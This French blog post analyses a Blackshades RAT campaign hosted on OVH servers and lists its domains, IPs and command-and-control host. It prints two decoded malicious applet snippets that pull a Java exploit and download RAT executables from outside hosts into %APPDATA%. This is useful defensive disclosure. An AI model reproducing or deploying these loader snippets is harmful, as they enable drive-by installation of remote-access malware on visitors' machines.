Blackshades RAT chez OVH France

Aujourd’hui, la VM qui contient quelques RAT a fait une mise à jour vers l’adresse : http://forthelulz.tk/bserver.exe – 91.121.85.223 OVH France.

Un tour vers le site initial et l’on voit que ce dernier propose des images, le lien des images pointe vers un binaire (funnyvideo.exe)

Le site lance un exploit Java qui va installer le RAT – rien d’exceptionnel avec les RAT.

Le Javascript malicieux qui est offusqué en Base64 en rouge ci-dessous :

Décodé, on obtient :

<applet width=’150′ height=’1′ code=’Java.class’ archive=’Java.jar’><param name=’lol’ value=’http://nlchat.us/bshades.exe’ /><param name=’location’ value=’%APPDATA%’ /><param name=’file’ value=’brAijXWL.exe’ /><param name=’r’ value =’http://zonamusical.net/tu_zona/index.php’ /></applet>
 

En cherchant l’IP 91.121.85.223 , on voit qu’un autre site zonamusical.net existe.. Un tour dessus et même topo –  un exploit Java se lance :

Le même type de JavaScript offusqué qui donne :

<applet width=’150′ height=’1′ code=’Java.class’ archive=’Java.jar’><param name=’lol’ value=’http://forthelulz.tk/bshades-crypted.exe’ /><param name=’location’ value=’%APPDATA%’ /><param name=’file’ value=’tMdDvY.exe’ /><param name=’r’ value =’http://www.forthelulz.tk/index2.html’ /></applet>
 

nlchat.us étant hébergé aussi chez OVH (46.105.127.193)

Le RAT en question se connecte à l’adresse igotu.sytes.net (174.136.43.16) sur le port 3333
L’ip se trouvant à Dallas – Texas (US)

Par contre, l’installation du RAT est foireuse au niveau de la création de la clef Run qui référence un fichier qui n’existe pas.
L’utilisation de machines chez OVH France arrivent parfois mais reste relativement rare.

(Visité 85 fois, 1 visites ce jour)

Vous pouvez aussi lire...

Vous pouvez lire les articles et tutoriels suivants en rapport avec cette page :
tutoriel VirusTotalLes virus USB

Besoin d'aide ?

Posez votre question ou soumettez votre problème sur le forum malekal.com pour obtenir une aide efficace : Aller sur le forum malekal.com